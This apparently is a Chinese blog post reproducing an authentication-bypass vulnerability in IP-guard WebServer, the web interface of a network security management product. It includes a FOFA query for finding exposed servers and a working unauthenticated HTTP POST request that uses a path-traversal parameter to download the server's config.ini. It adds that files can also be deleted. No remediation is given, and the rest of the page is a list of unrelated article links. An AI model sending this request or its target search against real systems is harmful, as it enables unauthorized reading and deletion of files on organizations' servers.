【漏洞复现】IP-guard WebServer 权限绕过漏洞

  • 开发
  • 9

0x01 产品简介

IP-guard WebServer 是 IP-guard 网络安全管理系统的一部分,用于提供 Web 界面以进行用户权限管理、监控和审计。

0x02 漏洞概述

IP-guard WebServer的权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。

0x03 测绘语句

fofa: icon_hash="2030860561"

0x04 漏洞复现

POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

0x05 影响范围

IP-guard Web
阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2024-04-28 06:58:03       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-28 06:58:03       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-04-28 06:58:03       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-04-28 06:58:03       20 阅读

热门阅读

  1. Web前后端交互

    2024-04-28 06:58:03       10 阅读

  7. K8s初次入门

    2024-04-28 06:58:03       14 阅读

  12. android layout 的文件夹可以创建子文件夹吗

    2024-04-28 06:58:03       14 阅读

  13. Android 生成二维码

    2024-04-28 06:58:03       11 阅读

  20. 基于单片机的配电网故障自适应监控系统设计

    2024-04-28 06:58:03       13 阅读

  21. RabbitMQ消息是如何分发的,消息是怎么路由的, RabbitMQ中的交换机类型有哪些

    2024-04-28 06:58:03       13 阅读

  22. Redis面试题超详细(2024最新)

    2024-04-28 06:58:03       21 阅读

  23. Ubuntu22.04安装Nvidia 550驱动和CUDA toolkit 12.4.1

    2024-04-28 06:58:03       15 阅读

  26. 练习题(2024/4/27)

    2024-04-28 06:58:03       13 阅读

  27. iptables动作

    2024-04-28 06:58:03       24 阅读

  28. CVaR(Conditional Value at Risk)模型是一种用于风险管理和投资组合优化的数学模型,其主要使用场景

    2024-04-28 06:58:03       36 阅读

  29. 【Kotlin】select简介

    2024-04-28 06:58:03       15 阅读